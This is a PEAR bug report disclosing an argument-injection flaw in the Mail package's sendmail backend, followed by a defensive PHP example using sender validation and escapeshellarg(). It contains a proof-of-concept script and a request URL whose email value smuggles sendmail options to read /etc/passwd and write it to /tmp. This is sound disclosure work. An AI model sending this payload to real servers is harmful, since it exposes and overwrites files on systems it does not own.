Edit report at http://pear.php.net/bugs/bug.php?id=16200&edit=1
ID: 16200
Updated by: daniel.oconnor@gmail.com
Reported By: root at 80sec dot com
Summary: security hole allow to read/write Arbitrary File
-Status: Open
+Status: Critical
Type: Bug
Package: Mail
Operating System: linux
Package Version: 1.1.14
PHP Version: 5.2.5
Roadmap Versions:
New Comment:
Bumping to critical for the moment.
Previous Comments:
------------------------------------------------------------------------
[2009-05-08 05:19:14] doconnor
Looks like this is safe on Windows.
------------------------------------------------------------------------
[2009-05-07 11:16:17] websec
Description:
------------
The Mail package used the escapeshellcmd function incorrectly, so it may
allow reading/writing arbitrary files.
Test script:
---------------
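<?php
ini_set('include_path', ini_get('include_path') . ':/usr/local/lib/php/PEAR:');
require_once("Mail.php");

// The request parameter flows into the From header without validation.
$from = "From: " . $_REQUEST['email'] . "\r\n";
$to = "xxxxxxx@zzzz.com";
$subj = "subscription request";
$body = "subscribe me";
// Cc and Bcc were undefined in the original script; set them explicitly.
$cc = "";
$bcc = "";
$hdrs = array(
    "To" => $to,
    "Cc" => $cc,
    "Bcc" => $bcc,
    "From" => $from,
    "Subject" => $subj,
);
$body = "test";
// The sendmail backend builds a shell command line that includes the From value.
$mail =& Mail::factory('sendmail');
$mail->send($to, $hdrs, $body);
?>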
test.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3
Expected result:
----------------
this may read /etc/passwd and write it to /tmp/wokao
Actual result:
--------------
this may read /etc/passwd and write it to /tmp/wokao
------------------------------------------------------------------------
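The report hinges on escapeshellcmd() escaping shell metacharacters while leaving whitespace alone, so a sender value interpolated into a command line can still split into extra sendmail arguments. The following is an added example, not PEAR Mail's code or its eventual fix: it validates the envelope sender and quotes it with escapeshellarg() so it reaches sendmail as one argument. The helper names, the sendmail path and the sample addresses are assumptions, and the behaviour shown is for a Unix shell.

```php
<?php
// Added example, not PEAR Mail code. isSafeEnvelopeSender() and
// buildSendmailCommand() are hypothetical helpers for illustration.

/**
 * Accept only a plain address as envelope sender: non-empty, no leading
 * '-', no whitespace or control characters, and a valid address syntax.
 */
function isSafeEnvelopeSender(string $from): bool
{
    if ($from === '' || $from[0] === '-') {
        return false;               // would be parsed as an option
    }
    if (preg_match('/[\s\x00-\x1f\x7f]/', $from)) {
        return false;               // tabs/spaces would split the argument
    }
    return filter_var($from, FILTER_VALIDATE_EMAIL) !== false;
}

/** Build the command line with every untrusted value as a single argument. */
function buildSendmailCommand(string $sendmailPath, string $from, array $recipients): string
{
    if (!isSafeEnvelopeSender($from)) {
        throw new InvalidArgumentException('Rejected envelope sender');
    }
    // escapeshellarg() wraps the value in single quotes, so the shell
    // passes it to sendmail as one argument attached to -f.
    $cmd = escapeshellcmd($sendmailPath) . ' -f' . escapeshellarg($from) . ' --';
    foreach ($recipients as $rcpt) {
        $cmd .= ' ' . escapeshellarg($rcpt);
    }
    return $cmd;
}

// Constructed input: an address followed by tab-separated extra tokens.
$hostile = "user@example.com\t-X\t/tmp/out";

// escapeshellcmd() returns the value unchanged: tabs are not metacharacters.
var_dump(escapeshellcmd($hostile) === $hostile);
// escapeshellarg() keeps the whole value inside one quoted argument.
echo escapeshellarg($hostile), "\n";

try {
    buildSendmailCommand('/usr/sbin/sendmail', $hostile, ['list@example.org']);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";    // validation stops it before any shell call
}
echo buildSendmailCommand('/usr/sbin/sendmail', 'user@example.com', ['list@example.org']), "\n";
```

Avoiding the shell altogether, for example by passing an argument array to proc_open() on PHP 7.4 or later, removes the quoting question entirely; the sender validation is still worth keeping.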